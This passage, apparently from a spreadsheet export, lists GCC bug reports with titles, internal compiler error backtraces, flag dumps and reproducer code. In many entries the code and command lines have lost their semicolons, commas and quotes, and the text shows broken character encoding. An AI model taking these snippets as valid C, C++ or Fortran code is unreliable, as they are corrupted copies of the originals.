Before defaults rs6000_isa_flags= 0x1f07e05c09613f: -maltivec -mcmpb -mcrypto -mdirect-move -mno-dlmzb \
                                                     -mefficient-unaligned-vsx -mno-float128 -mno-float128-type \
                                                     -mno-float128-hardware -mfprnd -mhard-dfp -mhtm -mno-isel \
                                                     -mmfcrf -mno-mfpgpr -mno-modulo -mno-mulhw -mno-multiple \
                                                     -mpopcntb -mpopcntd -mpower8-fusion -mno-power8-fusion-sign \
                                                     -mpower8-vector -mno-power9-dform-scalar \
                                                     -mno-power9-dform-vector -mno-power9-fusion -mno-power9-minmax \
                                                     -mno-power9-misc -mno-power9-vector -mpowerpc-gfxopt \
                                                     -mpowerpc-gpopt -mquad-memory -mquad-memory-atomic \
                                                     -mrecip-precision -mno-save-toc-indirect -mno-string \
                                                     -mno-toc-fusion -mupdate -mupper-regs-di -mupper-regs-df \
                                                     -mupper-regs-sf -mvsx -mvsx-small-integer -mno-vsx-timode \
                                                     -m64 -m32 -mno-eabi -mlittle -mbig -mno-relocatable \
                                                     -mno-strict-align -mno-soft-float -mno-string
At bottom of rs6000_override_internal
x_rs6000_isa_flags              = 
rs6000_isa_flags_explicit       = 
rs6000_isa_flags                = 0x3f06e07c0d713f: -maltivec -mcmpb -mcrypto -mdirect-move -mno-dlmzb \
                                                    -mefficient-unaligned-vsx -mno-float128 -mfloat128-type \
                                                    -mno-float128-hardware -mfprnd -mhard-dfp -mhtm -mno-isel \
                                                    -mmfcrf -mno-mfpgpr -mno-modulo -mno-mulhw -mno-multiple \
                                                    -mpopcntb -mpopcntd -mpower8-fusion -mpower8-fusion-sign \
                                                    -mpower8-vector -mno-power9-dform-scalar \
                                                    -mno-power9-dform-vector -mno-power9-fusion -mno-power9-minmax \
                                                    -mno-power9-misc -mno-power9-vector -mpowerpc-gfxopt \
                                                    -mpowerpc-gpopt -mno-quad-memory -mquad-memory-atomic \
                                                    -mrecip-precision -mno-save-toc-indirect -mno-string \
                                                    -mno-toc-fusion -mupdate -mupper-regs-di -mupper-regs-df \
                                                    -mupper-regs-sf -mvsx -mvsx-small-integer -mvsx-timode -m64 \
                                                    -m32 -mno-eabi -mlittle -mbig -mno-relocatable \
                                                    -mno-strict-align -mno-soft-float -mno-string
builtin mask                    = 0x800204d01d013: altivec vsx no-spe no-paired fre fres no-frsqrte no-frsqrtes \
                                                   popcntd no-cell power8-vector no-power9-vector no-power9-misc \
                                                   crypto htm hard-dfp hard-float long-double-128 float128
gimplification-error.c: In function â€˜mainâ€™:
gimplification-error.c:8:3: warning: assignment of read-only location â€˜((short int[8])y)[i]â€™
   y[i] = 7 - i
   ^
gimplification failed:
{ 0 1 2 3 4 5 6 7 } &lt;vector_cst 0x3fff942cc940
    type &lt;vector_type 0x3fff942b5940 __vector signed short
        type &lt;integer_type 0x3fff941105e8 short int public HI
            size 
            unit size 
            align 16 symtab 0 alias set -1 canonical type 0x3fff941105e8 precision 16 min  max 
            pointer_to_this &gt;
        readonly V8HI
        size 
        unit size 
        align 128 symtab 0 alias set -1 canonical type 0x3fff942b5940 nunits 8&gt;
    constant
    elt0:   constant 0&gt;
    elt1:   constant 1&gt;
    elt2:   constant 2&gt;
    elt3:   constant 3&gt;
    elt4:   constant 4&gt;
    elt5:   constant 5&gt;
    elt6:   constant 6&gt;
    elt7:   constant 7&gt;&gt;
gimplification-error.c:8:4: internal compiler error: gimplification failed
   y[i] = 7 - i
   ~^~~
0x108e6dbb gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:12155
0x108b2ebf gimplify_compound_lval
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:2845
0x108e2d07 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:11144
0x108c05db gimplify_modify_expr
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:5473
0x108e2eaf gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:11192
0x108c590b gimplify_stmt(tree_node** gimple**)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:6478
0x108ae2d3 gimplify_statement_list
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:1716
0x108e50bb gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:11619
0x108c590b gimplify_stmt(tree_node** gimple**)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:6478
0x108ac2ef gimplify_bind_expr
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:1290
0x108e3e1f gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:11391
0x108c590b gimplify_stmt(tree_node** gimple**)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:6478
0x108ae2d3 gimplify_statement_list
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:1716
0x108e50bb gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:11619
0x108c590b gimplify_stmt(tree_node** gimple**)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:6478
0x108e7f4b gimplify_body(tree_node* bool)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:12388
0x108e8b7b gimplify_function_tree(tree_node*)
	/home/kelvin/gcc-root/gcc-trunk/gcc/gimplify.c:12546
0x105dd1ef cgraph_node::analyze()
	/home/kelvin/gcc-root/gcc-trunk/gcc/cgraphunit.c:657
0x105df31f analyze_functions
	/home/kelvin/gcc-root/gcc-trunk/gcc/cgraphunit.c:1118
0x105e4e6f symbol_table::finalize_compilation_unit()
	/home/kelvin/gcc-root/gcc-trunk/gcc/cgraphunit.c:2599
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
make: *** [gimplification-error.s] Error 1</t>
  </si>
  <si>
    <t>GCC-3270</t>
  </si>
  <si>
    <t>ICE compiling libobjc on i386 for soft-float</t>
  </si>
  <si>
    <t>ICE when compiling part of libobjc with -msoft-float set.  This may be able to be reproduced using (I think) any i386-elf based configuration (probably even a native Linux) with
a command line like this:
....gcc -msoft-float -S j1.c
where j1.c is the attached file.  This is the original failure in the build tree.
/usr3/ftp_archive/gnu/gcc/ss/b2/b-i386/gcc/xgcc -B/usr3/ftp_archive/gnu/gcc/ss/b
2/b-i386/gcc/ -nostdinc -B/usr3/ftp_archive/gnu/gcc/ss/b2/b-i386/i386-rtems/newl
ib/ -isystem /usr3/ftp_archive/gnu/gcc/ss/b2/b-i386/i386-rtems/newlib/targ-inclu
de -isystem /usr3/ftp_archive/gnu/gcc/ss/b2/gcc-3.0-20010614/newlib/libc/include
 -B/opt/rtems/i386-rtems/bin/ -B/opt/rtems/i386-rtems/lib/ -isystem /opt/rtems/i
386-rtems/include -c -I. -I../../../../gcc-3.0-20010614/libobjc -g -O2 -msoft-fl
oat -DHAVE_GTHR_DEFAULT -DIN_GCC -DIN_TARGET_LIBS -I../../../../gcc-3.0-20010614
/libobjc/objc -I../../../../gcc-3.0-20010614/libobjc/../gcc -I../../../../gcc-3.
0-20010614/libobjc/../gcc/config -I../../../gcc -I../../../../gcc-3.0-20010614/l
ibobjc/../include ../../../../gcc-3.0-20010614/libobjc/sendmsg.c -o sendmsg.o
../../../../gcc-3.0-20010614/libobjc/sendmsg.c: In function `objc_msg_sendv':
../../../../gcc-3.0-20010614/libobjc/sendmsg.c:220: Internal  ompiler error in emit_swap_insn at reg-stack.c:951	
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [sendmsg.lo] Error 1
Release:
gcc-3.0-20010614
Environment:
GNU/Linux x86 (RedHat 6.2) targetting i386-rtems
How-To-Repeat:
See description.</t>
  </si>
  <si>
    <t>shebs</t>
  </si>
  <si>
    <t>GCC-84141</t>
  </si>
  <si>
    <t>[8 regression] Internal error: type_name(): Bad type</t>
  </si>
  <si>
    <t>There is a bad regression in the gfortran frontend introduced between r256722 and r257194. I try to come up with a minimal reproducer as soon as possible. In our code this crashes at least two of our unit and 3/4 of our functional tests. 
Internal Error: type_name(): Bad type
Error termination. Backtrace:
#0  0x10d0eb64c
#1  0x10d0ec2e5
#2  0x10d0ec79d
#3  0x10d2bde46
#4  0x10d2bdec8
#5  0x10d2c0c40
#6  0x10d2c11b4
#7  0x10d2be258
#8  0x1065a0a79
#9  0x1065a2131
#10  0x10254ff4f
#11  0x10254f823
#12  0x102551d6f
#13  0x101ce6ca6
#14  0x102808a53
#15  0x101cd8017
#16  0x1019fbc4e
#17  0x101ea6d8e
Code example will follow soon.</t>
  </si>
  <si>
    <t>GCC-6672</t>
  </si>
  <si>
    <t xml:space="preserve"> header produces errors</t>
  </si>
  <si>
    <t>The following file compiles with releases gcc-2.95.3 and snapshot gcc-20020513
but not with gcc-3.1.
#include 
int main(void)
{
  std::fstream file (fstreamtest.txt std::ios::out)
  file &lt;&lt; Test
}
The bug occurs in file
..gcc/include/g++-v3/bits/basic_file.h
  template
    class __basic_file_base: public __c_file_type
    {
__c_file_type is unknown producing a parse error before {
Release:
3.1
Environment:
Linux 2.4 i686
How-To-Repeat:
Just compile like
g++ -g -O2    fstreamt.cc   -o fstreamt
In file included from /net/bernd/gcc/include/g++-v3/fstream:48
                 from fstreamt.cc:1:
/net/bernd/gcc/include/g++-v3/bits/basic_file.h:52: parse error before `{'
   token
... subsequent messages omitted</t>
  </si>
  <si>
    <t>strieder</t>
  </si>
  <si>
    <t>GCC-40241</t>
  </si>
  <si>
    <t>?: operator incorrectly groups left in cpp</t>
  </si>
  <si>
    <t>The ?: operators are supposed to group right.  In gcc they do but in cpp they do not (i.e. they seem to group left in #if statements).
Example:
#include 
using std::hex
using std::dec
using std::cout
using std::endl
int main()
{
#   if ( 1 ? 0x0DFFFFFF : 3 &lt; 5 ? 1ull &lt;&lt; 36 : 1ull &lt;&lt; 40 ) &lt;= 0xDFFFFFFF
    cout &lt;&lt; OK GROUPING &lt;&lt; endl
#   else
#   error BAD GROUPING
#   endif
#   if ( 1 ? 0x0DFFFFFF : ( 3 &lt; 5 ? 1ull &lt;&lt; 36 : 1ull &lt;&lt; 40 ) ) &lt;= 0xDFFFFFFF
    cout &lt;&lt; OK WITH UNNESSARY PARENTHESES &lt;&lt; endl
#   else
#   error BAD WITH UNNECESSARY PARENTHESES
#   endif
}
This outputs the BAD GROUPING error.</t>
  </si>
  <si>
    <t>walton</t>
  </si>
  <si>
    <t>GCC-71366</t>
  </si>
  <si>
    <t>[7 Regression] ICE on valid code at -O3 on x86_64-linux-gnu: Segmentation fault</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O3 on x86_64-linux-gnu in both 32-bit and 64-bit modes.
It is a regression from 6.1.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160531 (experimental) [trunk revision 236912] (GCC)
$
$ gcc-trunk -O2 -c small.c
$ gcc-6.1 -O3 -c small.c
$
$ gcc-trunk -O3 -c small.c
small.c: In function â€˜fn1â€™:
small.c:4:1: internal compiler error: Segmentation fault
 fn1 ()
 ^~~
0xbbd02f crash_signal
        ../../gcc-source-trunk/gcc/toplev.c:333
0xd08d70 vec_safe_length
        ../../gcc-source-trunk/gcc/vec.h:529
0xd08d70 loop_outer
        ../../gcc-source-trunk/gcc/cfgloop.h:456
0xd08d70 tree_unroll_loops_completely_1
        ../../gcc-source-trunk/gcc/tree-ssa-loop-ivcanon.c:1347
0xd08ce0 tree_unroll_loops_completely_1
        ../../gcc-source-trunk/gcc/tree-ssa-loop-ivcanon.c:1314
0xd08ce0 tree_unroll_loops_completely_1
        ../../gcc-source-trunk/gcc/tree-ssa-loop-ivcanon.c:1314
0xd09013 tree_unroll_loops_completely(bool bool)
        ../../gcc-source-trunk/gcc/tree-ssa-loop-ivcanon.c:1384
0xd09583 execute
        ../../gcc-source-trunk/gcc/tree-ssa-loop-ivcanon.c:1593
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
-------------------------------------------
int a[1][2] b c
int
fn1 ()
{ 
  int d
  for ( c)
    for (d = 2 d &gt;= 0)
      { 
        int e[4] f = e[3]
        if (f)
          return b
        d--
        for ()
          { 
            c = a[0][d]
            break
          }
      }
  return 0
}</t>
  </si>
  <si>
    <t>GCC-33154</t>
  </si>
  <si>
    <t>[4.3 Regression] FAIL: gcc.c-torture/execute/20010119-1.c compilation  -Os</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/xgcc -B/test/gnu/gcc/objdir/gcc/ /te
st/gnu/gcc/gcc/gcc/testsuite/gcc.c-torture/execute/20010119-1.c  -w  -Os  -fno-s
how-column  -lm   -o /test/gnu/gcc/objdir/gcc/testsuite/gcc/20010119-1.x7    (ti
meout = 300)
/usr/ccs/bin/ld: Unsatisfied symbols:
   foo (first referenced in /var/tmp//ccUSmh7j.o) (code)
collect2: ld returned 1 exit status
compiler exited with status 1
output is:
/usr/ccs/bin/ld: Unsatisfied symbols:
   foo (first referenced in /var/tmp//ccUSmh7j.o) (code)
collect2: ld returned 1 exit status
FAIL: gcc.c-torture/execute/20010119-1.c compilation  -Os
UNRESOLVED: gcc.c-torture/execute/20010119-1.c execution  -Os
This is the assembly code generated on hppa2.0w-hp-hpux11.11:
# less 20010119-1.s
        .LEVEL 1.1
        .SPACE $PRIVATE$
        .SUBSPA $DATA$QUAD=1ALIGN=8ACCESS=31
        .SUBSPA $BSS$QUAD=1ALIGN=8ACCESS=31ZEROSORT=82
        .SPACE $TEXT$
        .SUBSPA $LIT$QUAD=0ALIGN=8ACCESS=44
        .SUBSPA $CODE$QUAD=0ALIGN=8ACCESS=44CODE_ONLY
        .IMPORT $global$DATA
        .IMPORT $$dyncallMILLICODE
        .SPACE $TEXT$
        .NSUBSPA $CODE$
        .align 4
        .EXPORT barENTRYPRIV_LEV=3ARGW0=GR
bar:
        .PROC
        .CALLINFO FRAME=0NO_CALLS
        .ENTRY
        bvn %r0(%r2)
        .EXIT
        .PROCEND
        .SPACE $TEXT$
        .NSUBSPA $CODE$
        .align 4
        .EXPORT bazENTRYPRIV_LEV=3ARGW0=GR
baz:
        .PROC
        .CALLINFO FRAME=0NO_CALLS
        .ENTRY
        bvn %r0(%r2)
        .EXIT
        .PROCEND
        .SPACE $TEXT$
        .NSUBSPA $CODE$
        .align 4
        .EXPORT mainENTRYPRIV_LEV=3RTNVAL=GR
main:
        .PROC
        .CALLINFO FRAME=64CALLSSAVE_RP
        .ENTRY
        stw %r2-20(%r30)
        ldi 10%r26
        ldo 64(%r30)%r30
        .CALL ARGW0=GRARGW1=GR
        bl foo%r2
        ldi 100%r25
        .CALL ARGW0=GR
        bl exit%r2
        ldi 0%r26
        nop
        .EXIT
        .PROCEND
        .IMPORT exitCODE
        .IMPORT fooCODE
This failure appears to have been introduced after revision 127629 and
before or in revision 127680.</t>
  </si>
  <si>
    <t>GCC-55481</t>
  </si>
  <si>
    <t>[4.8 regression] -O2 generates a wrong-code infinite loop in C++Benchmark's simple_types_constant_folding int8 xor test</t>
  </si>
  <si>
    <t>With current trunk at -O2 the attached preprocessed code emits what appears to be an infinite loop (linux/x64 binaries also attached). GCC 4.7 at -O2 and GCC 4.8 ant -O[13] do not exhibit the problem. I tried adding individual flags to -O1 to narrow the problem but wasn't able to reproduce.</t>
  </si>
  <si>
    <t>GCC-68182</t>
  </si>
  <si>
    <t>[6 Regression] ICE in reorder_basic_blocks_simple building libitm/beginend.cc</t>
  </si>
  <si>
    <t>Preprocessed source attached command-line
$ /work/alalaw01/build/./gcc/xg++ -B/work/alalaw01/build/./gcc/ -mrtm -O1 -g -m32 -c temp.ii
/work/alalaw01/src/gcc/libitm/beginend.cc: In static member function â€˜static uint32_t GTM::gtm_thread::begin_transaction(uint32_t const gtm_jmpbuf*)â€™:
/work/alalaw01/src/gcc/libitm/beginend.cc:400:1: internal compiler error: in operator[] at vec.h:714
 }
 ^
0x1310783 vec::operator[](unsigned int)
	/work/alalaw01/src/gcc/gcc/vec.h:714
0x1310783 reorder_basic_blocks_simple
	/work/alalaw01/src/gcc/gcc/bb-reorder.c:2322
0x1310783 reorder_basic_blocks
	/work/alalaw01/src/gcc/gcc/bb-reorder.c:2450
0x1310783 execute
	/work/alalaw01/src/gcc/gcc/bb-reorder.c:2551</t>
  </si>
  <si>
    <t>GCC-6535</t>
  </si>
  <si>
    <t>Away from my mail</t>
  </si>
  <si>
    <t xml:space="preserve"> I will not be reading my mail until May 6th.
 Your mail concerning Re: optimization/6534: Miscompiled expr from sh-utils on ia64
 will be read when I'm back.
 Ich werde wohl bis zum 6. Mai keine Mail lesen.
 Ihre Nachricht bzgl. Re: optimization/6534: Miscompiled expr from sh-utils on ia64 
 wird mich also erst nach meiner RÃ¼ckkehr erreichen.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-43885</t>
  </si>
  <si>
    <t>[4.6 Regression] build failure using self</t>
  </si>
  <si>
    <t>raised STORAGE_ERROR : stack overflow (or erroneous memory access)
make[3]: *** [ada/treeprs.ads] Fehler 1
make[3]: *** Warte auf noch nicht beendete Prozesse...
make[3]: Leaving directory `/home/ig25/Gcc/trunk-bin/gcc'
make[2]: *** [all-stage1-gcc] Fehler 2
make[2]: Leaving directory `/home/ig25/Gcc/trunk-bin'
make[1]: *** [stage1-bubble] Fehler 2
make[1]: Leaving directory `/home/ig25/Gcc/trunk-bin'
make: *** [all] Fehler 2
The bootstrapping compiler is
ig25@linux-fd1f:~/Gcc/trunk-bin&gt; gcc -v
Es werden eingebaute Spezifikationen verwendet.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/home/ig25/libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Ziel: x86_64-unknown-linux-gnu
Konfiguriert mit: ../trunk/configure --prefix=/home/ig25 --enable-languages=allada --with-mpc=/usr/local
Thread-Modell: posix
gcc-Version 4.6.0 20100412 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-35013</t>
  </si>
  <si>
    <t>Incomplete check in RTL for pm() annotation</t>
  </si>
  <si>
    <t>All credits for finding the root of the evil go to Andrew Hutchinson 
His original e-mail:
There is a bug!
Backend (avr part) creates special pm() annotation by looking at RTL. This is done in avr.c by this function:
static bool
avr_assemble_integer (rtx x unsigned int size int aligned_p)
{
debug_rtx(x) /*ADDED TO DEBUG*/
fprintf(stderrsize=%d align=%d\n\nsizealigned_p) /*ADDED TO DEBUG*/
 if (size == POINTER_SIZE / BITS_PER_UNIT &amp;&amp; aligned_p
     &amp;&amp; ((GET_CODE (x) == SYMBOL_REF &amp;&amp; SYMBOL_REF_FUNCTION_P (x))
     || GET_CODE (x) == LABEL_REF))
   {
     fputs (\t.word\tpm( asm_out_file)
     output_addr_const (asm_out_file x)
     fputs ()\n asm_out_file)
     return true
   }
 return default_assemble_integer (x size aligned_p)
}
(I added 2 lines to debug it)
You will see it looks symbol_ref or label_ref - otherwise it does not use pm.
So I ran it with following testcase to see what argument get sent:
//Dummy func
int table[]= {12}
char ctable[]= {34}
void foo(void) {}
//Table with address manipulation
void (* const pFuncTable[]) (void) = {
  foo + 0
  (foo + 1)
  foo +2
}
....and we get the following:
(const_int 1 [0x1])
size=2 align=1
(const_int 2 [0x2])
size=2 align=1
(const_int 3 [0x3])
size=1 align=1
(const_int 4 [0x4])
size=1 align=1
(symbol_ref:HI (foo) [flags 0x3] )
size=2 align=1
(const:HI (plus:HI (symbol_ref:HI (foo) [flags 0x3] )
       (const_int 1 [0x1])))
size=2 align=1
(const:HI (plus:HI (symbol_ref:HI (foo) [flags 0x3] )
       (const_int 2 [0x2])))
size=2 align=1
You will see last two cases are an expression with outer code as const:HI so it will not match it does not add pm().</t>
  </si>
  <si>
    <t>wvangulik</t>
  </si>
  <si>
    <t>GCC-54387</t>
  </si>
  <si>
    <t>[F03] Wrongly accepts non-proc result variable on the RHS of a proc-pointer assignment</t>
  </si>
  <si>
    <t>Found by James Van Buskirk in c.l.f's Function questions? thread:  https://groups.google.com/forum/?fromgroups=#!topic/comp.lang.fortran/r4PVbtaBnFM
The following program is invalid as foo inside the function is the result variable - hence i =&gt; foo doesn't make sense.
function foo()
  integer :: foo
  procedure() pointer :: i
  i =&gt; foo  ! Invalid RHS - in this context foo the RESULT variable
            ! To use the procedure name a RESULT(...) has to be specified
end</t>
  </si>
  <si>
    <t>GCC-64282</t>
  </si>
  <si>
    <t>[5 Regression] ICE in gimple_get_virt_method_for_vtable at gimple-fold.c:5635</t>
  </si>
  <si>
    <t>Created attachment 34263
preprocessed source
&gt; ./cc1plus  -quiet scim_skk_dictionary.ii -O2
scim_skk_dictionary.cpp:1190:1: internal compiler error: in gimple_get_virt_method_for_vtable at gimple-fold.c:5635
0xc44ef1 gimple_get_virt_method_for_vtable(long tree_node* unsigned long bool*)
        /space/rguenther/src/svn/trunk2/gcc/gimple-fold.c:5635
0x1812801 ipa_get_indirect_edge_target_1
        /space/rguenther/src/svn/trunk2/gcc/ipa-cp.c:1932
0x1812dd9 ipa_get_indirect_edge_target(cgraph_edge* vec vec vec bool*)
        /space/rguenther/src/svn/trunk2/gcc/ipa-cp.c:2030
0xd42213 estimate_edge_devirt_benefit
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline-analysis.c:3007
0xd42394 estimate_edge_size_and_time
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline-analysis.c:3048
0xd4262e estimate_calls_size_and_time
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline-analysis.c:3110
0xd4256a estimate_calls_size_and_time
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline-analysis.c:3098
0xd42aaa estimate_node_size_and_time
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline-analysis.c:3205
0xd44129 do_estimate_edge_time(cgraph_edge*)
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline-analysis.c:3701
0xd44303 do_estimate_edge_size(cgraph_edge*)
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline-analysis.c:3752
0xd394e2 estimate_edge_size
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline.h:289
0xd39549 estimate_edge_growth
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline.h:302
0xd44688 estimate_size_after_inlining(cgraph_node* cgraph_edge*)
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline-analysis.c:3845
0x1824835 caller_growth_limits
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline.c:204
0x1824f3f can_inline_edge_p
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline.c:374
0x1827307 update_caller_keys
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline.c:1208
0x1828ede inline_small_functions
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline.c:1838
0x1829e68 ipa_inline
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline.c:2189
0x182a996 execute
        /space/rguenther/src/svn/trunk2/gcc/ipa-inline.c:2562
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-9601</t>
  </si>
  <si>
    <t>-mrtd switch/stdcall attribute raises warnings for __buitltin functions</t>
  </si>
  <si>
    <t>Using the -mrtd switch or declaring standard library functions with __attribute__ ((stdcall)) raise warnings about builtin functions.  Warnings are emitted only when compiled as C not C++
This testcase (test-mrtd.c)
=====begin======
/* test-mrtd.c */
double  __attribute__((cdecl))  sqrt (double)
double  __attribute__((stdcall)) log (double)
double  cos (double)
=====-end=======
Using -mrtd switch:
D:\TEMP&gt;gcc  -c  -mrtd test-mrtd.c 
test-mrtd.c:1: warning: conflicting types for built-in function `sqrt'
test-mrtd.c:3: warning: conflicting types for built-in function `cos'
while using C (cdecl) convention as default
D:\TEMP&gt;gcc  -c  test-mrtd.c 
test-mrtd.c:2: warning: conflicting types for built-in function `log'
Looking at assembly for  code that actually uses  the declared functions it appears that the cdecl (C) calling convention is used for functions with builtin versions regardless of the attribute on the declaration.
This is not a regression.  The same problem occurs in 2.95.
Release:
gcc version 3.4 20030130 (experimental)
Environment:
i386-pc-mingw32 NT4-sp6
How-To-Repeat:
Testcase in description.</t>
  </si>
  <si>
    <t>GCC-9373</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE with -fstrict-aliasing in set_mem_alias_set at emit-rtl.c:1932</t>
  </si>
  <si>
    <t>When compiling the source with -fstrict-aliasing the following ICE occurs:
/usr/lib/gcc-snapshot/bin/g++ -c -Wall thread-log.ii -o z.o -fstrict-aliasing
../src/kern/ia32/thread-log.cpp: In static member function `static void
   Thread::hook_ipc_vector()':
../src/kern/ia32/thread-log.cpp:301: internal compiler error: in
   set_mem_alias_set at emit-rtl.c:1932
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Leaving -fstrict-aliasing out it compiles.
I also tried several previous versions from the 3.3 branch
which gave the same errors.
Release:
gcc version 3.3 20030118 (prerelease)
Environment:
Linux 2.4.20 SMP x86 Debian 3.0_r1/woody
gcc-snapshot_20030118-1_i386.deb
How-To-Repeat:
/usr/lib/gcc-snapshot/bin/g++ -c -Wall thread-log.ii -o z.o -fstrict-aliasing</t>
  </si>
  <si>
    <t>GCC-3211</t>
  </si>
  <si>
    <t>Incorrect substitution related mangling.</t>
  </si>
  <si>
    <t>There are still issues with (de)mangling and qualifiers.
Qualifiers and pointer-to-member may even result in
wrong mangling as a result of errornous substitutions.
Release:
3.0
How-To-Repeat:
See audit trail that I will post in a moment.</t>
  </si>
  <si>
    <t>GCC-28136</t>
  </si>
  <si>
    <t>[4.0 regression] ICE with incomplete array type</t>
  </si>
  <si>
    <t>The C frontend crashes on the following line of invalid code since GCC 4.0.0:
================================
int i = (struct A[]) {}
================================
bug.c:1: error: array type has incomplete element type
bug.c:1: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in c_parser_postfix_expression_after_paren_type at c-parser.c:5432
Please submit a full bug report [etc.]
Before the code was wrongly accepted.
I'll post a patch soon.</t>
  </si>
  <si>
    <t>GCC-48054</t>
  </si>
  <si>
    <t>Documentation for LOG intrinsic function is ambiguous</t>
  </si>
  <si>
    <t>The documentation for the LOG (Logarithm) function does not mention that this function calculates the natural logarithm the logarithm to the base e.
Also the example:
            real(8) :: x = 1.0_8
            x = log(x)
is not very meaningful since the result is 0.0 for all logarithm bases.
Suggested fix:
Change the headline and description to
LOG â€” Natural logarithm function
LOG(X) computes the logarithm of X to base e.
or to (a modified version of the LOG10 doc):
LOG â€” Base e logarithm function
LOG(X) computes the base e logarithm of X. 
and change the example to
            real(8) :: x = 2.718281828_8
which yields (approximately) 1</t>
  </si>
  <si>
    <t>GCC-19895</t>
  </si>
  <si>
    <t>[4.0 regression] ICE on invalid class in pointer-to-member declaration</t>
  </si>
  <si>
    <t>The following invalid code snippet causes an ICE on mainline:
=============================
template struct A
{
    int A::* p
}
=============================
bug.cc:3: error: type/value mismatch at argument 1 in template parameter list
for 'template struct A'
bug.cc:3: error:   expected a type got '0'
bug.cc:3: internal compiler error: tree check: expected class 'type' have
'exceptional' (error_mark) in build_offset_type at tree.c:4593
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-26480</t>
  </si>
  <si>
    <t>[4.2 Regression] No rule to make cstdbool needed by stamp-tr1</t>
  </si>
  <si>
    <t>make[4]: *** No rule to make target `/Users/lucier/programs/gcc/mainline/libstdc++-v3/include/tr1/cstdbool' needed by `stamp-tr1'.  Stop.
make[3]: *** [all-recursive] Error 1
make[2]: *** [all] Error 2
make[1]: *** [all-target-libstdc++-v3] Error 2
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-53790</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] ICE on dereferencing a extern union in asm statement</t>
  </si>
  <si>
    <t>Created attachment 27713
Preprocessed sources
gcc-4.6.3 causes ICE when compiling program which dereferences a extern union in asm().
It is avoided if the union's structure is made known to the compiler at compile time.(Defined inside the c file or in an include file).
Removing optimization(-O0) also avoid this problem.
------------------------------
typedef long long uint64
typedef struct s {
    uint64 value
} s_t
static inline uint64
do_some_asm(s_t const *var)
{
   uint64 value
   __asm__ __volatile__(
      xor %1 %0
      : =r (value)
      : r (var-&gt;value)
   )
   return value
}
typedef union u u_t
int main()
{
    extern u_t extern_var
    return do_some_asm((s_t *)
}
----------------------------
$gcc -v -save-temps -O3 sample.c
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.6.3/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure
Thread model: posix
gcc version 4.6.3 (GCC)
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O3' '-mtune=generic' '-march=x86-64'
 /usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.6.3/cc1 -E -quiet -v sample.c -mtune=generic -march=x86-64 -O3 -fpch-preprocess -o sample.i
ignoring nonexistent directory /usr/local/lib/gcc/x86_64-unknown-linux-gnu/4.6.3/../../../../x86_64-unknown-linux-gnu/include
